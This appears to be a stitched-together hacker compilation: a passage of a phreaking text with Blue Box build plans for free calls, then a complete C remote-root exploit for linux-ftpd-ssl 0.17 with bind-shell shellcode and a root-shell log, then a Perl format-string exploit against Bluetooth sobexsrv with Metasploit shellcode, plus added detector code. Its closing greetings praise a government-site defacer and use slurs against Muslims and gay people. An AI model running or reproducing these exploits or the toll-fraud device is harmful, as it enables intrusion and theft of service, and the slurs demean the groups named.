written by Mr. America and Nickie Halflinger. Those plans soon (in about 90
seconds) became very vague in their context, with a couple of inconsistencies,
but I decided to "rough it out" using those plans (based on the Exar 2207 VCO)
and build the Blue Box using that as my guide. During the construction of the
Blue Box, I decided to type up a "more complete and clear" set of Blue Box
schematics than the file that I based mine on, in order to help others who may
be trying/thinking of building a Blue Box. I hope these help.

Note: You should get a copy of the Mr. America/Nickie Halflinger Blue Box
plans. Those plans may be of help to anyone who may have difficulty
understanding these plans. Also, these plans currently do not support CCITT.

+---------------------------------+
| Why should I build a Blue Box ? |
+---------------------------------+

Many of you may have that question, and here's my answer. Blue Boxing was
the origin of phreaking (excluding whistling). Without the advent of Blue
Boxes, I feel that some of the advances in the telecommunications industry
would've taken longer to develop (the need to stop the phone phreaks forced
AT&T Bell Laboratories to "step up" their development to stop those thieves!).
There is no harm in building a Blue Box (except the knowledge you will
gain in the field of electronics). Although there are software programs (Soft
Blue Boxes) available for many micros that will produce the Blue Box
Multi-Frequency (MF) tones, they are not as portable as an actual Blue Box (you
can't carry your computer to a telephone, so you must use it from home, which
could possibly lead to danger).
Many phreaks are announcing the end of the Blue Box Era, but due to
discoveries I have made (even on ESS 1A and possibly ESS 5), I do not believe
this to be true. Although many people consider Blue Boxing "a pain in the
ass", I consider Blue Boxing to be "phreaking in its purest form". There is
much to learn on the current fone network that has not been written about, and
Blue Boxes are necessary for some of these discoveries. The gift of free fone
calls tends to be a bonus.

Note: Blue Boxes also make great Christmas gifts!

+---------------------------------------+
| Items needed to construct a Blue Box. |
+---------------------------------------+
Here is the list of items you will need and where you can get them. It
may be a good idea to gather some of the key parts (the chips, and especially
the potentiometers, they took about 6 months to back order through Digi-key. A
whole 6 fucking months!) before you start this project. Also, basic
electronics tools will be necessary, and you might want to test the circuit on
a bread board, then wire-wrap the final project. Also, you will need a box of
some sort to put it in (like the blue plastic kind at Radio Shack that cost
around $5.00).

Note: An oscilloscope should be used when tuning in the
potentiometers because the Bell system allows
only a 7-10% tolerance in the precision of the
frequencies.

Qty. | Item                | Part No.  | Place
-----+---------------------+-----------+---------------------------
 1   | 4 x 4 Keypad        |           | Digi-Key
 6   | Inverter Chip       | 74C04     |
32   | Potentiometer       |           |
 1   | 4-16 Converter Chip | 74LS154   |
 1   | 16 Key Decoder      | 74C922    |
 2   | 2207 VCO            | XR2207CP  | Exar Corp.
 3   | .01 uf Capacitor    | 272-1051  | Radio Shack
 5   | .1 uf Capacitor     | 272-135   | Radio Shack
 2   | 1.5K Ohm Resistor   |           | Radio Shack
 2   | 1.0K Ohm Resistor   |           | Radio Shack
 1   | Speaker             |           | From an old Autovon fone.
 1   | 9 Volt Battery      |           | Anywhere

The resistors should be a +/- 5% tolerance.
The speaker can be from a regular telephone (mine just happened to be from
an old Autovon phone). But make sure that you remove the diode.
The potentiometers should have a 100K Ohm range (but you may want to make
the calculations yourself to double check).
The 9-volt battery can be obtained for free if you use your Radio Shack
Free Battery Club card.
The Exar 2207 VCO can be found if you call the Exar Corp. located in
Sunnyvale, California. Call them, and tell them the state you live in, and
they'll give you the name and phone number of the distributor located
closest to you. The 2207 will vary from about $3.00 for the silicon-grade
(which is the one you'll want to use) to about $12.00 for the high-grade
Military chip.
Note: When you call Exar, you may want to ask them to send you the
spec sheets, which give greater detail as to the operation and construction of
the chip.

+-------------------+
| Schematic Diagram |
+-------------------+

+--------------+ +-------------+
| 1 2 3 A | | Figure #1 |
| 4 5 6 B | +-------------+
| 7 8 9 C | | Logic Side |
| * 0 # D | +-------------+
++-+-+-+-+-+-+-+
1 | 3 | 5 | 7 | (VCC)
| 2 | 4 | 6 | 8 (+5 Volts) +----+
| | | | | | | | [+] | _|_
| | | | | | | | | | X_/GND
+--+-+-+-+-+-+-+-+----+ +--+----------+---+
| 2 | 11| 10| 7 | | | 14 7 |
(.01C) | | 3 | 4 | 8 | 1 12+------+1 |
+--||---+5 13+------+2 (*74C04*) |
_|_ | | | |
X_/GND | (*74C922*) | +-----------------+
+--||-+6 |
|(.1C)| |
_|_ | |
X_/GND | 9 17 16 15 14 18|
+--+--+--+--+--+---+--+
| | | | | |
_|_ A B C D |
GNDX_/ | | | | [+] (VCC) [+] (VCC)
| | | | (+5 volts) | (+5 volts)
| | | | |
-------+--+--+--+------------------+-----------------
| 23 22 21 20 24 18+-+
+-----+12 | +--+
| | (*74LS154*) 19+-+ _|_
_|_ | | X_/
X_/GND | 1 2 3 4 5 6 7 8 9 10 11 13 14 15 16 17 | GND
+--+--+--+--+--+--+--+--+--+-+--+--+--+--+--+--+----+
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| | | | | | | | | | | | | | | |
| (Connects)
| +---------->
+------------------------+ | (Figure 2)
| +--+ +-------+
| | | |
+--+-------+--+-------+---+
| 3--|>o--4 5--|>o--6 |
| (Invtr.) (Invtr.) |
+---------------+7 |
_|_ | (*74C04*) |
GNDX_/ (VCC) [+]--+14 |
(+5 volts) | |
+-------------------------+



+-------------+ _
| Figure #2 | / |
+---+-------------+----+ +----------------+ |
| Tone Generation Side | _|_ | | SPKR
+----------------------+ GNDX_/ +---+--+---+ |
| | X_|
| |
| | +---------------+
+-------+ | | | |
| _|_ | +--+14 |
| X_/GND | | (Repeat of) |
| | | (First) |
----- (.1C) | | (Circuit) |
----- | | |
| | | (*XR2207CP*) |
| +-----------------+ | +--+6 |
| | | | | | |
[+]-----+-------+1 14+--+ | +---------------+
(VCC) | | +--------------------+
(+9 Volts) +----+2 | |
| | 12+---------------------+ |
(.01C) ----- | | _|_ |
----- | (*XR2207CP*) | X_/GND |
| | | 1.5K Ohms |
+----+3 11+---+---X/XRx/X/---+--+ |
| | | | _|_ |
| | +---X/XRx/X/---+ X_/GND |
| | 1.0K Ohms |
| 10+----+ |
+-------------+6 9+----+---+ |
| | 8+----+ | |
| | | ----- (.1C) |
| +-----------------+ ----- |
+---------+ _|_ +----------+
| | Pot. GNDX_/ Pot. | |
| X/X/X/X/--+-----------------------X/X/X/X/ |
| 1400 Hz. | 1600 Hz. |
+---------+ | +----------+
| | Pot. | Pot. | |
| X/X/X/X/--+----------------+------X/X/X/X/ |
| 1500 Hz. | | 900 Hz. |
| | | |
| 14 more | | 14 More |
| Potentiometers | | Potentiometers |
| in this | | in this |
| area left out | | area left out |
| for simplicity | | for simplicity |
| | | |
| | | |
|
(Connects) |
<-------------+
(Figure 1)


+-------------------------+
| Multiplex Keypad System |
+-------------------------+

First, the multiplex pattern used in the 4x4 keypad layout. I suggest that
keys 0-9 be used as the Blue Box's 0-9 keys, and then you can assign the A-D, *, #
keys to your comfort (i.e. * = Kp, # = St, D = 2600, and A-C as Kp1, Kp2 or
however you want).

Note: On your 2600 Hz. key (The D key in example above)
it may be a good idea to tune in a second
potentiometer to 3700 Hz. (Pink Noise).

Keypad Key Assignments Multiplex Pattern
+---------+ +-------------+ +------------+
| 1 2 3 A | | 1 2 3 4 | | 1 2 3 A |----Y1=8 X1=3
| 4 5 6 B | | 5 6 7 8 | | 4 5 6 B |----Y2=1 X2=5
| 7 8 9 C | | 9 10 11 12 | | 7 8 9 C |----Y3=2 X3=6
| * 0 # D | | 13 14 15 16 | | * 0 # D |----Y4=4 X4=7
+---------+ +-------------+ +------------+
| | | |
X1 X2 X3 X4

+----------------------+
| Blue Box Frequencies |
+----------------------+

This section is taken directly from Mark Tabas's "Better Homes and Blue
Boxing" file, Part 1.

Frequencies (Hz)   Domestic   Int'l
------------------------------------
700+900            1          1
700+1100           2          2
900+1100           3          3
700+1300           4          4
900+1300           5          5
1100+1300          6          6
700+1500           7          7
900+1500           8          8
1100+1500          9          9
1300+1500          0          0

700+1700           ST3p       Code 11
900+1700           STp        Code 12
1100+1700          KP         KP1
1300+1700          ST2p       KP2
1500+1700          ST         ST
2600+3700          *Trunking Frequency*

Note: For any further information about the uses or duration of the
frequencies, read the Mark Tabas files.
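As an added example, not part of Jester Sluggo's file or the Tabas files, here is the receiving side that the tolerance note and the frequency table above imply: a Goertzel-based detector that tells which MF pair (or a lone 2600 Hz seize tone) a frame of telephone-band audio carries, and rejects a tone that a mis-tuned potentiometer has pushed outside its window. The frame length, the 5% window, and the synthesized test signals are assumptions made for the example.

```python
import math

SAMPLE_RATE = 8000   # samples per second, telephone band
FRAME = 0.08         # seconds per detection frame: 640 samples, 12.5 Hz per bin (assumed)
TOL = 0.05           # accepted deviation per tone (assumed); the page quotes 7-10%, but
                     # +/-7% at 1700 Hz is +/-119 Hz and would overlap the 1500 Hz window

# MF pairs from the frequency table above (domestic column), as (low, high) -> symbol.
MF_TABLE = {
    (700, 900): "1", (700, 1100): "2", (900, 1100): "3",
    (700, 1300): "4", (900, 1300): "5", (1100, 1300): "6",
    (700, 1500): "7", (900, 1500): "8", (1100, 1500): "9",
    (1300, 1500): "0", (700, 1700): "ST3p", (900, 1700): "STp",
    (1100, 1700): "KP", (1300, 1700): "ST2p", (1500, 1700): "ST",
}
MF_FREQS = sorted({f for pair in MF_TABLE for f in pair})   # 700 .. 1700
SEIZE_FREQ = 2600    # trunk seize tone, the "D" key in the keypad layout above

def synth(freqs, duration=FRAME, detune=0.0, amplitude=0.4):
    """Constructed test signal: a sum of sine tones, each shifted by `detune`
    (a fraction, 0.03 = 3% high) to mimic a mis-tuned potentiometer."""
    n = int(SAMPLE_RATE * duration)
    return [sum(amplitude * math.sin(2 * math.pi * f * (1 + detune) * i / SAMPLE_RATE)
                for f in freqs) for i in range(n)]

def goertzel_bin(samples, k):
    """Power in DFT bin k by the Goertzel recurrence, scaled so that a pure sine of
    amplitude A sitting exactly on the bin reports its mean-square value A**2 / 2."""
    n = len(samples)
    coeff = 2 * math.cos(2 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return 2 * (s1 * s1 + s2 * s2 - coeff * s1 * s2) / (n * n)

def band_power(samples, freq, tol=TOL):
    """Strongest bin within +/- tol of freq: the receiver's tolerance window."""
    n = len(samples)
    lo = math.floor(n * freq * (1 - tol) / SAMPLE_RATE)
    hi = math.ceil(n * freq * (1 + tol) / SAMPLE_RATE)
    return max(goertzel_bin(samples, k) for k in range(lo, hi + 1))

def classify(samples, share=0.2):
    """Return the MF symbol carried by one frame, "SEIZE" for a lone 2600 Hz tone,
    or None. A tone counts as present only if its window holds at least `share`
    of the frame's mean-square power, so a tone pushed out of every window by
    mis-tuning is rejected rather than guessed."""
    total = sum(x * x for x in samples) / len(samples)
    if total < 1e-9:
        return None                                   # silence
    present = [f for f in MF_FREQS + [SEIZE_FREQ]
               if band_power(samples, f) >= share * total]
    if present == [SEIZE_FREQ]:
        return "SEIZE"
    if len(present) == 2 and SEIZE_FREQ not in present:
        return MF_TABLE.get(tuple(present))           # ascending, like the table keys
    return None

def synth_sequence(symbols):
    """Constructed burst: each symbol is one FRAME of tone, then one FRAME of silence."""
    by_symbol = {v: k for k, v in MF_TABLE.items()}
    gap = [0.0] * int(SAMPLE_RATE * FRAME)
    out = []
    for s in symbols:
        out += synth([SEIZE_FREQ] if s == "SEIZE" else list(by_symbol[s])) + gap
    return out

def decode_sequence(samples):
    """Classify frame by frame; each tone burst yields its symbol once."""
    n = int(SAMPLE_RATE * FRAME)
    found, last = [], None
    for i in range(0, len(samples) - n + 1, n):
        sym = classify(samples[i:i + n])
        if sym is not None and sym != last:
            found.append(sym)
        last = sym
    return found
```

A 3% detuned KP pair still lands inside its windows and decodes; at 12% the low tone drifts into the 1300 Hz window, so the frame no longer forms a valid pair and is rejected.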

+----------------+
| Schematic Help |
+----------------+

This is the key to the diagrams in the schematic. I hope that they help
more than they might hurt.

_|_
X_/GND is the Ground symbol

| |
---| |-- is the Capacitor symbol
| | (.1C) stands for a .1 uf Capacitor
(.01C) stands for a .01 uf Capacitor
|
-----
----- is another Capacitor symbol
|

--X/XRx/X/-- is the Resistor symbol (The 1.5K Ohm and 1.0K Ohm
Resistors are at +/- 5% )
---+
|
X/X/X/X/-- is the Potentiometer symbol (The frequencies I supplied
above are just examples.)
--|>o-- is the Inverter symbol

+------------+
| Conclusion |
+------------+

This is just one way to build a Blue Box. If you choose this way, then I
hope this file is adequate to aid you in the construction. Although
these are not the best plans, they do work. This file does not tell you how to
use it or what to do once it's built. For that information I recommend that you
read Mark Tabas's "Better Homes and Blue Boxing" files, or any other files/BBS
subboards that deal with that realm.
If you need help, I sluggest (thanks for that one Taran) that you ask a
close friend, possibly an electronics teacher, or a phreak friend to help you.
Also, if you need help or have questions or comments about this file, you can
address them to me. I can be contacted through the LOD/H Technical Journal
Staff account on the boards listed in the Intro, or on the few boards I call.

+-------------+
! Credentials !
+-------------+

At last, this article would not be possible without the help of the
following people/places who contributed to it in one way or another (it may
not be apparent to them, but every minute bit helps).

Deserted Surfer (Who helped immensely from Day 1 of this project.)
(Without his help this file would not be.)
Mark Tabas (For the BHBB files which inspired my interests.)
Nickie Halflinger (For the original Blue Box plans I used.)
Mr. America (For the original Blue Box plans I used.)
Lex Luthor
Cheap Shades
Exar Corp.

Lastly, I would like to thank the United States government for furnishing
federal grants to this project. Without their financial help, I would have had
to dish out the money from my own pocket (Approximately $80.00. Egads!)


************************************************************************************
linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit
-by dumb0

/*
connecting to 192.168.2.9:21... ok.
OK - STARTING ATTACK
+++ USING STACK ADDRESS 0xbfffcc03 +++
+++ USING STACK ADDRESS 0xbfffcc13 +++
+++ USING STACK ADDRESS 0xbfffcc23 +++
+++ USING STACK ADDRESS 0xbfffcc33 +++
+++ USING STACK ADDRESS 0xbfffcc43 +++
+++ USING STACK ADDRESS 0xbfffcc53 +++
+++ USING STACK ADDRESS 0xbfffcc63 +++
+++ USING STACK ADDRESS 0xbfffcc73 +++
+++ USING STACK ADDRESS 0xbfffcc83 +++
+++ USING STACK ADDRESS 0xbfffcc93 +++
+++ USING STACK ADDRESS 0xbfffcca3 +++
+++ USING STACK ADDRESS 0xbfffccb3 +++
+++ USING STACK ADDRESS 0xbfffccc3 +++
+++ USING STACK ADDRESS 0xbfffccd3 +++
+++ USING STACK ADDRESS 0xbfffcce3 +++
+++ USING STACK ADDRESS 0xbfffccf3 +++
+++ USING STACK ADDRESS 0xbfffcd03 +++
+++ USING STACK ADDRESS 0xbfffcd13 +++
+++ USING STACK ADDRESS 0xbfffcd23 +++
+++ USING STACK ADDRESS 0xbfffcd33 +++
+++ USING STACK ADDRESS 0xbfffcd43 +++
+++ USING STACK ADDRESS 0xbfffcd53 +++
+++ USING STACK ADDRESS 0xbfffcd63 +++
+++ USING STACK ADDRESS 0xbfffcd73 +++
+++ USING STACK ADDRESS 0xbfffcd83 +++
+++ USING STACK ADDRESS 0xbfffcd93 +++
+++ USING STACK ADDRESS 0xbfffcda3 +++
+++ USING STACK ADDRESS 0xbfffcdb3 +++
+++ USING STACK ADDRESS 0xbfffcdc3 +++
+++ USING STACK ADDRESS 0xbfffcdd3 +++
+++ USING STACK ADDRESS 0xbfffcde3 +++
+++ USING STACK ADDRESS 0xbfffcdf3 +++
+++ USING STACK ADDRESS 0xbfffce03 +++
+++ USING STACK ADDRESS 0xbfffce13 +++
+++ USING STACK ADDRESS 0xbfffce23 +++
+++ USING STACK ADDRESS 0xbfffce33 +++
+++ USING STACK ADDRESS 0xbfffce43 +++
+++ USING STACK ADDRESS 0xbfffce53 +++
+++ USING STACK ADDRESS 0xbfffce63 +++
+++ USING STACK ADDRESS 0xbfffce73 +++
+++ USING STACK ADDRESS 0xbfffce83 +++
+++ USING STACK ADDRESS 0xbfffce93 +++
+++ USING STACK ADDRESS 0xbfffcea3 +++
+++ USING STACK ADDRESS 0xbfffceb3 +++
+++ USING STACK ADDRESS 0xbfffcec3 +++

id
uid=0(root) gid=0(root) egid=1000(dumb0) groups=1000(dumb0),20(dialout),24(cdrom
),25(floppy),29(audio),44(video),46(plugdev)
uname -a
Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux


// Tested on Linux 2.4.18-14 Redhat 8.0
// Linux 2.2.20-idepci Debian GNU 3.0
// Linux 2.4.27-2-386 Debian GNU 3.1
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define BUF_SIZ 4096
#define PORT 21
#define BINDPORT 30464
#define STACK_START 0xbfffcc03
#define STACK_END 0xbffff4f0

/*my shellcode*/
/*setreuid,chroot break,
bind to port 30464, 0xff is double*/

unsigned char lnx_bind[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x70\x31\xC0\x31\xDB\x31\xC9"
"\xB0\x46\xCD\x80\x5E\x90\xB8\xBE"
"\xff\xff\xff\xff\xff\xff\xF7\xD0"
"\x89\x06\xB0\x27\x8D\x1E\xFE\xC5"
"\xB1\xED\xCD\x80\x31\xC0\x8D\x1E"
"\xB0\x3D\xCD\x80\x66\xB9\xff\xff"
"\x03\xBB\xD2\xD1\xD0\xff\xff\xF7"
"\xDB\x89\x1E\x8D\x1E\xB0\x0C\xCD"
"\x80\xE2\xEF\xB8\xD1\xff\xff\xff"
"\xff\xff\xff\xF7\xD0\x89\x06\xB0"
"\x3D\x8D\x1E\xCD\x80\x31\xC0\x31"
"\xDB\x89\xF1\xB0\x02\x89\x06\xB0"
"\x01\x89\x46\x04\xB0\x06\x89\x46"
"\x08\xB0\x66\x43\xCD\x80\x89\xF1"
"\x89\x06\xB0\x02\x66\x89\x46\x0C"
"\xEB\x04\xEB\x74\xEB\x77\xB0\x77"
"\x66\x89\x46\x0E\x8D\x46\x0C\x89"
"\x46\x04\x31\xC0\x89\x46\x10\xB0"
"\x10\x89\x46\x08\xB0\x66\x43\xCD"
"\x80\xB0\x01\x89\x46\x04\xB0\x66"
"\xB3\x04\xCD\x80\x31\xC0\x89\x46"
"\x04\x89\x46\x08\xB0\x66\xB3\x05"
"\xCD\x80\x88\xC3\xB0\x3F\x31\xC9"
"\xCD\x80\xB0\x3F\xB1\x01\xCD\x80"
"\xB0\x3F\xB1\x02\xCD\x80\xB8\xD0"
"\x9D\x96\x91\xF7\xD0\x89\x06\xB8"
"\xD0\x8C\x97\xD0\xF7\xD0\x89\x46"
"\x04\x31\xC0\x88\x46\x07\x89\x76"
"\x08\x89\x46\x0C\xB0\x0B\x89\xF3"
"\x8D\x4E\x08\x8D\x56\x0C\xCD\x80"
"\xE8\x15\xff\xff\xff\xff\xff\xff";

long ficken() {
printf("lnxFTPDssl_warez.c\nlinux-ftpd-ssl 0.17 remote r00t exploit by dumb0\n\n");
return 0xc0debabe;
}

void usage(char **argv) {
printf("Insufficient parameters given.\n");
printf("Usage: %s <remotehost> <user> <pass> [writeable directory]\n", argv[0]);
exit(0);
}

void _recv(int sock, char *buf) {
int bytes=recv(sock, buf, BUFSIZ, 0);
if (bytes < 0) {
perror("read() failed");
exit(1);
}
}

void attack(int sock, unsigned long ret, char *pad) {
int i,k;
char *x=(char*)malloc(1024);
char *bufm=(char*)malloc(1024);
char *bufc=(char*)malloc(1024);
char *rbuf=(char*)malloc(BUFSIZ+10);
char *nops=(char*)malloc(1024);
unsigned char a,b,c,d;

memset(nops,0,1024);
memset(nops,0x90,255);
memset(x,0,1024);
for (i=0,k=0;i<60;i++) {
a=(ret >> 24) & 0xff;
b=(ret >> 16) & 0xff;
c=(ret >> 8) & 0xff;
d=(ret) & 0xff;

if (d==255) {
x[k]=d;
x[++k]=255;
} else {
x[k]=d;
}

if (c==255) {
x[k+1]=c;
x[++k+1]=255;
} else {
x[k+1]=c;
}

if (b==255) {
x[k+2]=b;
x[++k+2]=255;
} else {
x[k+2]=b;
}

if (a==255) {
x[k+3]=a;
x[++k+3]=255;
} else {
x[k+3]=a;
}

k+=4;
}

snprintf(bufm, 1000, "MKD %s%s\r\n", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1
snprintf(bufc, 1000, "CWD %s%s\r\n", pad, x);
for (i=0; i<11; i++) {
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}

for (i=0; i<2; i++) {
snprintf(bufm, 1000, "MKD %s\r\n", lnx_bind);
snprintf(bufc, 1000, "CWD %s\r\n", lnx_bind);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);

snprintf(bufm, 1000, "MKD %s\r\n", nops);
snprintf(bufc, 1000, "CWD %s\r\n", nops);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}

send(sock, "XPWD\r\n", strlen("XPWD\r\n"), 0);

free(bufm);
free(bufc);
free(x);
free(rbuf);
}

int do_remote_shell(int sockfd)
{
while(1)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sockfd,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
{
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds))
{
if((cnt=read(0,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(sockfd,buf,cnt);
}
if(FD_ISSET(sockfd,&fds))
{
if((cnt=read(sockfd,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(1,buf,cnt);
}
}
}
return 0;   /* reached when either side of the relay closes */
}

int do_connect (char *remotehost, int port) {
struct hostent *host;
struct sockaddr_in addr;
int s;

if (!inet_aton(remotehost, &addr.sin_addr))
{
host = gethostbyname(remotehost);
if (!host)
{
perror("gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}

s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return -1;
}

addr.sin_port = htons(port);
addr.sin_family = AF_INET;

if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
if (port == PORT) perror("connect() failed");
return -1;
}

return s;
}

void do_login(int s, char *buf, char *sendbuf, char *user, char *pass) {
/* both buffers are malloc(BUFSIZ+10) in main(); sizeof on the pointer would clear only 4-8 bytes */
memset(buf, 0, BUFSIZ+10);
memset(sendbuf, 0, BUFSIZ+10);
do {
_recv(s, buf);
} while (strstr(buf, "220 ") == NULL);
snprintf(sendbuf, BUFSIZ, "USER %s\r\n", user);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "331 ") == NULL);

snprintf(sendbuf, BUFSIZ, "PASS %s\r\n", pass);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "230 ") == NULL);
}

int main(int argc, char **argv) {
char remotehost[255];
char user[255];
char pass[255];
char pad[10] = "";   /* empty on the first try; the loop below cycles through "A", "AA", "AAA" */
char *buf,*sendbuf;
int stackaddr=STACK_START;
int s,sr00t,i;

ficken();
if (argc < 4)
usage(argv);

strncpy(remotehost, argv[1], sizeof(remotehost));
remotehost[sizeof(remotehost)-1]=0;
strncpy(user, argv[2], sizeof(user));
user[sizeof(user)-1]=0;
strncpy(pass, argv[3], sizeof(pass));
pass[sizeof(pass)-1]=0;

printf("connecting to %s:%d...", remotehost, PORT);
fflush(stdout);

s=do_connect(remotehost, PORT);

puts(" ok.");
buf=(char*)malloc(BUFSIZ+10);
sendbuf=(char*)malloc(BUFSIZ+10);
do_login(s, buf, sendbuf, user, pass);

if (strstr(buf, "230")!=NULL) {
printf("OK - STARTING ATTACK\n");
i=0;
while (stackaddr <= STACK_END) {
printf("+++ USING STACK ADDRESS 0x%.08x +++\n", stackaddr);

sleep(1);

if (i==1) {
strcpy(pad, "A");
}

if (i==2) {
strcpy(pad, "AA");
}

if (i==3) {
strcpy(pad, "AAA");
i=0;
}

attack(s, stackaddr, pad);
close(s);
s=do_connect(remotehost, PORT);
do_login(s, buf, sendbuf, user, pass);

if (argv[4] != NULL) {
snprintf(sendbuf, BUFSIZ, "CWD %s\r\n", argv[4]);
send(s, sendbuf, strlen(sendbuf), 0);
recv(s, buf, BUFSIZ, 0);
}

if((sr00t=do_connect(remotehost, BINDPORT)) > 0) {
/* XXX Remote r00t */
printf("\nLet's get ready to rumble!\n");
do_remote_shell(sr00t);
exit(0);
}

stackaddr+=16;
i++;
}
} else {
printf("\nLogin incorrect\n");
exit(1);
}

free(buf);
free(sendbuf);
return 0;
}
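As an added example, not dumb0's code and not part of linux-ftpd-ssl, here is the detection side of the loop above run over a constructed control-channel capture: it flags MKD/CWD arguments that are overlong, binary, padded with a 0x90 sled, or built from a repeating 4-byte pattern (the sprayed return address), and raises a session-level alert once several such commands appear, which is the address-guessing loop rather than one odd client. The thresholds and the sample session are assumptions.

```python
import re
from collections import Counter

# Thresholds are assumptions for this example, not values taken from linux-ftpd-ssl.
MAX_ARG_LEN = 255        # longer than any plausible directory name
MIN_REPEATS = 16         # identical 4-byte windows: the return-address spray the loop builds
NOP_SLED = b"\x90" * 32  # a run of x86 NOPs like the one sent ahead of the shellcode

DIR_CMD = re.compile(rb"^(MKD|CWD|XMKD|XCWD)[ \t]+(.*)$", re.IGNORECASE | re.DOTALL)

def inspect_command(line):
    """Return the reasons one FTP control-channel line resembles the MKD/CWD
    overflow above; an empty list means it looks benign."""
    m = DIR_CMD.match(line.rstrip(b"\r\n"))
    if not m:
        return []
    verb, arg = m.group(1).upper().decode(), m.group(2)
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append(f"{verb} argument is {len(arg)} bytes long")
    binary = sum(1 for b in arg if b < 0x20 or b >= 0x80)
    if binary:
        reasons.append(f"{binary} non-printable bytes in {verb} argument")
    if NOP_SLED in arg:
        reasons.append("NOP sled (run of 0x90) in argument")
    windows = Counter(arg[i:i + 4] for i in range(len(arg) - 3))
    if windows and windows.most_common(1)[0][1] >= MIN_REPEATS:
        word, n = windows.most_common(1)[0]
        reasons.append(f"4-byte pattern {word.hex()} repeats {n} times (address spray)")
    return reasons

def inspect_session(lines):
    """Inspect one session's commands. Returns (flagged, alert): flagged maps line
    index to its reasons; alert is True once several directory commands look
    hostile, the signature of the address-guessing loop."""
    flagged = {i: inspect_command(l) for i, l in enumerate(lines)}
    flagged = {i: r for i, r in flagged.items() if r}
    return flagged, len(flagged) >= 3

# Constructed capture shaped like the loop above: a normal login and directory
# change, then padded address-spray MKD/CWD pairs, then NOP-sled pairs.
SPRAY = b"AA" + b"\x03\xcc\xff\xff\xbf" * 60   # pad + one guessed address, 0xff doubled
SAMPLE_SESSION = [
    b"USER dumb0\r\n",
    b"PASS secret\r\n",
    b"CWD /pub/incoming\r\n",
    b"MKD upload\r\n",
    b"MKD " + SPRAY + b"\r\n",
    b"CWD " + SPRAY + b"\r\n",
    b"MKD " + b"\x90" * 255 + b"\r\n",
    b"CWD " + b"\x90" * 255 + b"\r\n",
    b"XPWD\r\n",
]
```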


**********************************************************************************************
#!/usr/bin/perl
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.cdej.org

$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents.

# R_386_JUMP_SLOT exit()
$addy = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";

$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;

$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;

#print "hi: $hi\n";
#print "lo: $lo\n";

$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";

$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";

open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);

system($string);



*******************************************************************************************************
On behalf of the elite CDEJ staff I'd like to thank the following figures for
making this possible:

Longarm: our beloved monkey chief <:D>

trans: 5 stars general trans :D? highest member in ranking so far :D? you outdone yourself again
little brother, :.)

hunt3rx: mysterious spy/fed :? brought us l0lz n ports when the CDEJ staff was out on field trips in
m*slim (spit) territories, and our usual gay day jobs. Thank you hunt3rx

_Padre_ : recounced .gov defacer with pure moral intentions: lebx0r is gay ditch it!

